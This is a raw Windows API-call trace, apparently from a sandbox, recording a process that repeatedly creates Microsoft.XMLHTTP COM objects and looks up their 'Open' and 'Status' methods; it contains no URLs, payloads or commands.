	[0815.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0815.619] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0815.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0815.620] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0815.620] SysStringLen (param_1=0x0) returned 0x0
	[0815.620] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0815.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0815.621] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0815.621] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0815.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0815.621] ??2@YAPEAX_K@Z () returned 0x62f310
	[0815.621] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0815.621] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0815.621] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0815.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0815.621] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0815.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0815.622] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0815.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0815.627] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0815.627] SysStringLen (param_1=0x0) returned 0x0
	[0815.627] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0815.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0815.628] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0815.628] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0815.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0815.628] ??2@YAPEAX_K@Z () returned 0x62f330
	[0815.628] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0815.628] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0815.628] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0815.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0815.628] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0815.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0815.629] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0815.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0815.629] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0815.629] SysStringLen (param_1=0x0) returned 0x0
	[0815.629] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0815.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0815.629] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0815.629] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0815.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0815.629] ??2@YAPEAX_K@Z () returned 0x62f310
	[0815.629] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0815.630] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0815.630] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0815.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0815.630] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0815.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0815.630] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0815.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0815.630] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0815.630] SysStringLen (param_1=0x0) returned 0x0
	[0815.630] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0815.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0815.631] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0815.631] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0815.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0815.631] ??2@YAPEAX_K@Z () returned 0x62f330
	[0815.631] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0815.631] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0815.631] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0815.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0815.631] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0815.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0815.631] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0815.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0815.632] longjmp () 
	[0815.632] longjmp () 
	[0815.632] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0815.632] SysStringLen (param_1=0x0) returned 0x0
	[0815.632] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0815.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0815.632] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0815.632] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0815.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0815.632] ??2@YAPEAX_K@Z () returned 0x62f310
	[0815.633] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0815.633] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0815.633] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0815.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0815.633] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0815.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0815.633] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0815.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0815.634] longjmp () 
	[0815.634] longjmp () 
	[0815.634] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0815.634] SysStringLen (param_1=0x0) returned 0x0
	[0815.634] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0815.634] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0815.635] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0815.635] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0815.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0815.635] ??2@YAPEAX_K@Z () returned 0x62f330
	[0815.635] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f330) 
	[0815.635] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0815.635] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0815.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0815.635] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0815.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0815.635] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0815.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
